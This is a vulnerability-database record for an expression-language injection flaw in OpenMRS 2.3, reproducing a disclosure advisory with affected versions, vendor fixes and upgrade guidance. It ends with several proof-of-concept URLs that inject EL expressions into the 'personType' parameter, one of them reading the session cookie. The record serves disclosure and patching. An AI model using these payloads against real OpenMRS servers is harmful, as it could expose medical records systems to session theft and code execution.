DATABASE RESOURCES PRICING ABOUT US

{"id": "EDB-ID:38897", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "OpenMRS 2.3 (1.11.4) - Expression Language Injection", "description": "", "published": "2015-12-08T00:00:00", "modified": "2015-12-08T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/38897", "reporter": "LiquidWorm", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2022-08-16T08:21:53", "viewCount": 7, "enchantments": {"score": {"value": 0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "zeroscience", "idList": ["ZSL-2015-5288"]}]}, "exploitation": null, "vulnersScore": 0.1}, "_state": {"dependencies": 1661190352, "score": 1661184847, "epss": 1678803316}, "_internal": {"score_hash": "ab7bb4bfb8c5ed6c99563cacebe453b1"}, "sourceHref": "https://www.exploit-db.com/download/38897", "sourceData": "OpenMRS 2.3 (1.11.4) Expression Language Injection Vulnerability\r\n\r\n\r\nVendor: OpenMRS Inc.\r\nProduct web page: http://www.openmrs.org\r\nAffected version: OpenMRS 2.3, 2.2, 2.1, 2.0 (Platform 1.11.4 (Build 6ebcaf), 1.11.2 and 1.10.0)\r\n OpenMRS-TB System (OpenMRS 1.9.7 (Build 60bd9b))\r\n\r\nSummary: OpenMRS is an application which enables design\r\nof a customized medical records system with no programming\r\nknowledge (although medical and systems analysis knowledge\r\nis required). It is a common framework upon which medical\r\ninformatics efforts in developing countries can be built.\r\n\r\nDesc: Input passed via the 'personType' parameter is not\r\nproperly sanitised in the spring's expression language\r\nsupport via 'addPerson.htm' script before being used. This\r\ncan be exploited to inject expression language (EL) and\r\nsubsequently execute arbitrary Java code.\r\n\r\n\r\nTested on: Ubuntu 12.04.5 LTS\r\n Apache Tomcat/7.0.26\r\n Apache Tomcat/6.0.36\r\n Apache Coyote/1.1\r\n\r\n\r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2015-5288\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5288.php\r\n\r\nAffected: OpenMRS Core, Serialization.Xstream module, Metadata Sharing module\r\nSeverity: Major\r\nExploit: Remote Code Execution by an authenticated user\r\n\r\nVendor Bug Fixes:\r\n\r\nDisabled serialization and deserialization of dynamic proxies\r\nDisabled deserialization of external entities in XML files\r\nDisabled spring's Expression Language support\r\n\r\nhttps://talk.openmrs.org/t/openmrs-security-advisories-2015-11-30/3868\r\nhttps://talk.openmrs.org/t/critical-security-advisory-2015-11-25/3824\r\nhttps://wiki.openmrs.org/display/RES/Release+Notes+2.3.1\r\nhttp://openmrs.org/2015/12/reference-application-2-3-1-released/\r\nhttps://wiki.openmrs.org/display/RES/Platform+Release+Notes+1.9.10\r\nhttps://wiki.openmrs.org/display/RES/Platform+Release+Notes+1.10.3\r\nhttps://wiki.openmrs.org/display/RES/Platform+Release+Notes+1.11.5\r\nhttps://modules.openmrs.org/modulus/api/releases/1308/download/serialization.xstream-0.2.10.omod\r\nhttps://modules.openmrs.org/modulus/api/releases/1309/download/metadatasharing-1.1.10.omod\r\nhttps://modules.openmrs.org/modulus/api/releases/1303/download/reporting-0.9.8.1.omod\r\n\r\nOpenMRS platform has been upgraded to version 1.11.5\r\nReporting module has been upgraded to version 0.9.8.1\r\nMetadata sharing module has been upgraded to version 1.1.10\r\nSerialization.xstream module has been upgraded to version 0.2.10\r\n\r\nWho is affected?\r\n\r\nAnyone running OpenMRS Platform (1.9.0 and later)\r\nAnyone running OpenMRS Reference Application 2.0, 2.1, 2.2, 2.3\r\nAnyone that has installed the serialization.xstream module except for the newly released 0.2.10 version.\r\nAnyone that has installed the metadatasharing module except for the newly released 1.1.10 version.\r\n\r\n\r\n02.11.2015\r\n\r\n--\r\n\r\n\r\nhttp://127.0.0.1:8080/openmrs/admin/person/addPerson.htm?personType=${3*3}&viewType=\r\nhttp://127.0.0.1:8080/openmrs/admin/person/addPerson.htm?personType=${applicationScope}&viewType=\r\nhttp://127.0.0.1:8080/openmrs/admin/person/addPerson.htm?personType=%3Ci%3E${username}&viewType=\r\nhttp://127.0.0.1:8080/openmrs/admin/person/addPerson.htm?personType=${cookie[%22JSESSIONID%22].value}\r\nhttp://127.0.0.1:8080/openmrs/admin/person/addPerson.htm?personType=${Condition?%22Ok%22:3%3C2}", "osvdbidlist": ["131537"], "exploitType": "webapps", "verified": false}

{}